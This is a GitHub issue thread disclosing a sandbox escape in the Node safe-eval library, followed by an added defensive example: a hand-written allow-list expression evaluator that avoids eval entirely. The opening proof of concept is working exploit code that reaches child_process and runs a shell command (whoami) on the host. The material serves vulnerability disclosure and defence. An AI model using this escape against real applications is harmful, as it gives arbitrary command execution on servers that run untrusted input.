Open a0xnirudh opened 4 years ago
The following script can lead to safe-eval sandbox escape (node v12.13.0):

```javascript
const safeEval = require('safe-eval');

const theFunction = function () {
  // Error object with its prototype detached and its `stack` property
  // replaced by an object exposing a `match` method
  const bad = new Error();
  bad.__proto__ = null;
  bad.stack = {
    match(outer) {
      throw outer.constructor.constructor("return process")()
        .mainModule.require('child_process')
        .execSync('whoami')
        .toString();
    }
  };
  return bad;
};

const untrusted = `(${theFunction})()`;
console.log(safeEval(untrusted));
```
Inspired by @XmiliaH's vm2 escape.
@a0xnirudh Appreciate the POC. I knew you could get mainModule but did not realize the require call was so straightforward.
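The thread shows that safe-eval, a thin wrapper over Node's vm module, is not a security boundary: objects created inside the sandbox can still reach the host realm. The defensive alternative is to never hand untrusted text to eval, Function or vm at all. The following is an added example, not code from the issue or from the safe-eval project: a small allow-list expression evaluator that tokenizes, parses and walks its own AST, so the only names untrusted input can resolve are own properties of a caller-supplied plain object holding numbers and booleans. Every name in it (`tokenize`, `parse`, `evaluate`, the grammar) is my own choice for this illustration.

```javascript
'use strict';

// Allow-list expression evaluator (constructed example). Supports numbers,
// true/false, named variables, unary - and !, arithmetic, comparison and
// boolean operators. No eval/Function/vm is ever invoked, so there is no
// host realm for untrusted input to escape into.

// Sticky regex: one token per exec call, starting at lastIndex.
const TOKEN_RE = /\s*(?:(\d+(?:\.\d+)?)|([A-Za-z_][A-Za-z0-9_]*)|(<=|>=|==|!=|&&|\|\||[-+*\/%()<>!]))/y;

function tokenize(src) {
  const tokens = [];
  TOKEN_RE.lastIndex = 0;
  while (TOKEN_RE.lastIndex < src.length) {
    const m = TOKEN_RE.exec(src);
    // Anything outside the grammar (e.g. '.', '[', quotes) is rejected here.
    if (!m) throw new SyntaxError(`unexpected input in ${JSON.stringify(src)}`);
    if (m[1] !== undefined) tokens.push({ t: 'num', v: Number(m[1]) });
    else if (m[2] !== undefined) tokens.push({ t: 'id', v: m[2] });
    else tokens.push({ t: 'op', v: m[3] });
  }
  return tokens;
}

// Precedence levels, lowest first; unary operators bind tighter than all of them.
const BINARY = [['||'], ['&&'], ['==', '!='], ['<', '>', '<=', '>='], ['+', '-'], ['*', '/', '%']];

function parse(tokens) {
  let pos = 0;
  const peek = () => tokens[pos];
  const take = (v) => {
    const tok = tokens[pos];
    if (!tok || (v !== undefined && tok.v !== v)) throw new SyntaxError(`expected ${v ?? 'token'}`);
    pos++;
    return tok;
  };
  function binary(level) {
    if (level === BINARY.length) return unary();
    let node = binary(level + 1);
    while (peek() && peek().t === 'op' && BINARY[level].includes(peek().v)) {
      const op = take().v;
      node = { k: 'bin', op, l: node, r: binary(level + 1) };
    }
    return node;
  }
  function unary() {
    const tok = peek();
    if (tok && tok.t === 'op' && (tok.v === '-' || tok.v === '!')) {
      take();
      return { k: 'un', op: tok.v, e: unary() };
    }
    return primary();
  }
  function primary() {
    const tok = take();
    if (tok.t === 'num') return { k: 'num', v: tok.v };
    if (tok.t === 'id') return { k: 'id', v: tok.v };
    if (tok.v === '(') { const e = binary(0); take(')'); return e; }
    throw new SyntaxError(`unexpected token ${tok.v}`);
  }
  const ast = binary(0);
  if (pos !== tokens.length) throw new SyntaxError('trailing input');
  return ast;
}

const BIN_OPS = {
  '+': (a, b) => a + b, '-': (a, b) => a - b, '*': (a, b) => a * b,
  '/': (a, b) => a / b, '%': (a, b) => a % b,
  '<': (a, b) => a < b, '>': (a, b) => a > b, '<=': (a, b) => a <= b, '>=': (a, b) => a >= b,
  '==': (a, b) => a === b, '!=': (a, b) => a !== b,
  '&&': (a, b) => a && b, '||': (a, b) => a || b,
};

function evalNode(node, vars) {
  switch (node.k) {
    case 'num': return node.v;
    case 'id': {
      if (node.v === 'true') return true;
      if (node.v === 'false') return false;
      // Own properties only: prototype names such as `constructor` never resolve.
      if (!Object.prototype.hasOwnProperty.call(vars, node.v)) throw new ReferenceError(`unknown name ${node.v}`);
      const v = vars[node.v];
      if (typeof v !== 'number' && typeof v !== 'boolean') throw new TypeError(`${node.v} is not a number or boolean`);
      return v;
    }
    case 'un': { const e = evalNode(node.e, vars); return node.op === '-' ? -e : !e; }
    case 'bin': return BIN_OPS[node.op](evalNode(node.l, vars), evalNode(node.r, vars));
    default: throw new Error('unreachable');
  }
}

// Evaluate an untrusted expression against a plain object of primitives.
function evaluate(src, vars = {}) {
  return evalNode(parse(tokenize(src.trim())), vars);
}

module.exports = { tokenize, parse, evaluate };
```

Because the grammar has no member access, calls, strings or assignment, the untrusted text cannot name `constructor`, `__proto__`, `process` or `require` in any useful way; such input fails at the tokenizer or at name resolution with a plain exception. Whenever the feature set genuinely needs a full language, run it out of process with its own OS-level sandbox rather than inside the caller's Node process.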